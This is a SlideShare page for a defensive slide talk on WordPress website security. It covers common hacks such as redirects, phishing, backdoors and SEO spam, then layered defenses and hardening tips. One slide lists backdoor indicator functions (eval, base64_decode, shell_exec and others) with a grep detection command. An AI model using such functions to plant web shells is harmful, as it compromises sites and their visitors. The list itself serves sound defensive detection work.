Website Security - It Begins With Good Posture

2,529 views

Published on

Published in: Technology, News & Politics
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,529
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
28
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Website Security - It Begins With Good Posture

  1. 1. It Starts With Good Posture Website Security (WordPress)
  2. 2. @PEREZBOX • Sucuri, Inc. – @sucuri_security – @sucurisupport – @sucurilabs – @perezbox • Specialization: – Website Security – Incident Handling • Special Interests: – Brazilian JiuJitsu 6/9/2014 Tony Perez | @perezbox | @sucuri_security 2
  3. 3. • Website Security Company • Global Operations • Platform Agnostic (i.e., WordPress, Joomla, etc..) • Scan 2M Unique Domains a Month • Block 4M web attacks a Month • Remediate 400 – 500 websites a day • Signature / Heuristic Based • 24/7 operations 6/9/2014 Tony Perez | @perezbox | @sucuri_security 3
  4. 4. Statistics 6/9/2014 Tony Perez | @perezbox | @sucuri_security 4
  5. 5. Anatomy of Malicious Websites Malicious Websites Legitimate Websites 6/9/2014 Tony Perez | @perezbox | @sucuri_security 5
  6. 6. Legitimate Websites Not-Exploitable Exploitable 6/9/2014 Tony Perez | @perezbox | @sucuri_security 6 1 in 8 - Critical Vulnerability
  7. 7. Hacks Affecting Users 6/9/2014 Tony Perez | @perezbox | @sucuri_security 7
  8. 8. Top 4 Symptoms 6/9/2014 Tony Perez | @perezbox | @sucuri_security 8 • Malicious Redirects (i.e., abuse your traffic) • Backdoors (i.e., Bypass Access Controls) • Phishing (i.e., Spear Phishing Campaigns) • Search Engine Poisoning (i.e., Pharma, etc…) ….. Obviously many more, but these are the most prevalent…
  9. 9. Malicious Redirect @perezbox | @sucuri_security
  10. 10. Malicious Redirects • Easy / Medium to Detect – Be mindful of conditionals • Looking for Integrity Issues – Has something been modified? • Common location[s]: – .htaccess – Index.php – Footer.php – Header.php • Biggest Issue – Redirectors are becoming highly complex – Employing heavy conditional elements @perezbox | @sucuri_security
  11. 11. Phishing @perezbox | @sucuri_security
  12. 12. Phishing, Cntd.. • Difficult to Detect Remotely • Looking for Integrity Issues – Is something somewhere it doesn’t belong? • Common location[s]: – WP-Includes – Theme Directories • Biggest Issue – It can be anywhere – Fully contained @perezbox | @sucuri_security
  13. 13. Backdoors @perezbox | @sucuri_security
  14. 14. Backdoors, cntd… • Can’t detect remotely, only locally • Looking for Integrity Issues – Is something somewhere it doesn’t belong? • Common location[s]: – WP-Includes – Root Directory • Biggest Issue – Allows attacker to bypass your access controls – Provides full control of the environment @perezbox | @sucuri_security • Common terms: – Is_bot – Eval – Base64_decode – Fopen – Fclose – readfile – Edoced_46esad – Exec – System – Shell_exec – Gzuncompress – popen – FilesMan grep -RPl --include=*.{php} "(system|exec|passthru|shell_exec|base64_decode|eval|) *(" /var/www
  15. 15. Example of Complexity @perezbox | @sucuri_security
  16. 16. Search Engine Poisoning @perezbox | @sucuri_security
  17. 17. Search Engine Poisoning, cntd.. • Targets Search Engines (i.e., Google, Bing, Yahoo) • Looking for Integrity Issues – Have your posts / pages been modified? • Common location[s]: – Index.php (root, theme, plugins, etc..) – Header.php – Footer.php – Embedded in Database (Posts / Pages) • Biggest Issue – Continuous to evolve – Highly conditional – Not within visible range – often offscreen @perezbox | @sucuri_security
  18. 18. Indicators of a Hack Search Engines have gotten pretty good at detecting issues – Google blacklists over 10 thousand websites a day. @perezbox | @sucuri_security
  19. 19. Anatomy of Attacks 6/9/2014 Tony Perez | @perezbox | @sucuri_security 19
  20. 20. Phase of an Attack 6/9/2014 Tony Perez | @perezbox | @sucuri_security 20  Use for malware?  Pat of a zombie network?  Data breach? What kind of website do you have?
  21. 21. Automated Attacks 6/9/2014 Tony Perez | @perezbox | @sucuri_security 21  Exploiting Access Control
  22. 22. Distribution Mechanism 6/9/2014 Tony Perez | @perezbox | @sucuri_security 22
  23. 23. There’s a Tool for that • Malware as a Service (MaaS) – Yes, pay someone to hack for you • Different tools to break in and generate payloads – Brute force and vulnerability exploits Malware Payloads 6/9/2014 Tony Perez | @perezbox | @sucuri_security 23
  24. 24. Why? 6/9/2014 Tony Perez | @perezbox | @sucuri_security 24
  25. 25. Happening To Everyone 6/9/2014 Tony Perez | @perezbox | @sucuri_security 25
  26. 26. It’s About Posture 6/9/2014 Tony Perez | @perezbox | @sucuri_security 26
  27. 27. Begins with Posture 6/9/2014 Tony Perez | @perezbox | @sucuri_security 27 Posture Risk “Risk will never be zero, but it can be reduced”
  28. 28. It’s About Good Posture 6/9/2014 Tony Perez | @perezbox | @sucuri_security 28
  29. 29. Layered Defenses 6/9/2014 Tony Perez | @perezbox | @sucuri_security 29 Protection Auditing Detection Sustainment
  30. 30. Defense in Depth “…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…” 6/9/2014 Tony Perez | @perezbox | @sucuri_security 30
  31. 31. Access – P@ssw0rd • Passwords 6/9/2014 Tony Perez | @perezbox | @sucuri_security 31 Complex – Long - Unique
  32. 32. Enforce Strong Credentials 6/9/2014 Tony Perez | @perezbox | @sucuri_security 32
  33. 33. Auditing (Monitor Activity) 6/9/2014 Tony Perez | @perezbox | @sucuri_security 33
  34. 34. Auditing Questions 6/9/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 34 • Understand what is going on at all time – Who is logging in? – Who is trying to log in? – What files are changing? – Has a post been created? – Has a page been created? – Are there any integrity issues?
  35. 35. Principle of Least Privileged “requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.” 6/9/2014 Tony Perez | @perezbox | @sucuri_security 35
  36. 36. Understand Your Roles 6/9/2014 Tony Perez | @perezbox | @sucuri_security 36
  37. 37. Hardening – Kill PHP 6/9/2014 Tony Perez | @perezbox | @sucuri_security 37  PHP Execution, disable it:  /wp-includes  /wp-content ▪ /themes ▪ /plugins ▪ /uploads <Files *.php> Deny from all </Files>
  38. 38. Disable Plugin / Theme Editor • WP-CONFIG File Modification #Disable Plugin / Theme Editor Define(‘DISALLOW_FILE_EDIT’,true); 6/9/2014 Tony Perez | @perezbox | @sucuri_security 38
  39. 39. Brute Force Attacks 6/9/2014 Tony Perez | @perezbox | @sucuri_security 39
  40. 40. Backups – It’s Your Safety Net 6/9/2014 Tony Perez | @perezbox | @sucuri_security 40
  41. 41. Software Vulnerabilities • Stay current with the latest vulnerabilities: – Secure - http://wordpress.org/plugins/secure/ 6/9/2014 Tony Perez | @perezbox | @sucuri_security 41
  42. 42. Stay Current (Update) 6/9/2014 Tony Perez | @perezbox | @sucuri_security 42
  43. 43. Website Firewalls 6/9/2014 Tony Perez | @perezbox | @sucuri_security 43 • Stay ahead of Software Vulnerabilities
  44. 44. Ensure Integrity of Connection 6/9/2014 Tony Perez | @perezbox | @sucuri_security 44 • https://www.getcloak.com/ | @getcloak
  45. 45. Google Webmaster 6/9/2014 Tony Perez | @perezbox | @sucuri_security 45
  46. 46. Simple Steps to Reduce Risk 1. Employ Website Firewall 2. Don’t let WordPress write to itself 3. Filter Access by IP 4. Use a dedicated server / VPS 5. Monitor all Activity (Logging) 6. Enable SSL for transactions 7. Keep environment current (patched) 8. No Soup Kitchen Servers 6/9/2014 Tony Perez | @perezbox | @sucuri_security 46 1. Connect Securely – SFTP / SSH 2. Authentication Keys / wp- config 3. Use Trusted Sources 4. Use a local Antivirus – MAC too 5. Permissions - D 755 | F 644 6. Least Privileged Principles 7. Accountability 8. Backups – Include Database Ideal implementations:The Bare Minimum:
  47. 47. Notable Resources Name Tool Sucuri Blog http://blog.sucuri.net Sucuri TV http://sucuri.tv Malware Scanner http://sitecheck.sucuri.net Malware Scanner http://unmaskparasites.com Badware Busters https://badwarebusters.org Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked WordPress Hardening http://codex.wordpress.org/Hardening_WordPress 6/9/2014 Tony Perez | @perezbox | @sucuri_security 47
  48. 48. Dealing with a Hack 6/9/2014 Tony Perez | @perezbox | @sucuri_security 48 Dealing with Malware http://blog.sucuri.net/2012/10/dealing-with-todays- wordpress-malware.html Leveraging Google Webmaster Tools http://www.unmaskparasites.com/malware- warning-guide/ Google Webmaster Tools (Hacked) http://www.google.com/webmasters/hacked/ Understanding Google’s Blacklists http://blog.sucuri.net/2013/11/understanding- googles-blacklist-cleaning-your-hacked-website-and- removing-from-blacklist.html Clearing Your Website with Free Scanner http://blog.sucuri.net/2013/10/cleaning-up-your- wordpress-site-with-the-free-sucuri-plugin.html WordPress Tips & Tricks http://blog.sucuri.net/2012/07/website-malware- removal-wordpress-tips-tricks.html
  49. 49. Sucuri, Inc. Tony Perez http://sucuri.net http://blog.sucuri.net @perezbox | @sucuri_security @sucurilabs | @sucurisupport 6/9/2014 Tony Perez | @perezbox | @sucuri_security 49

×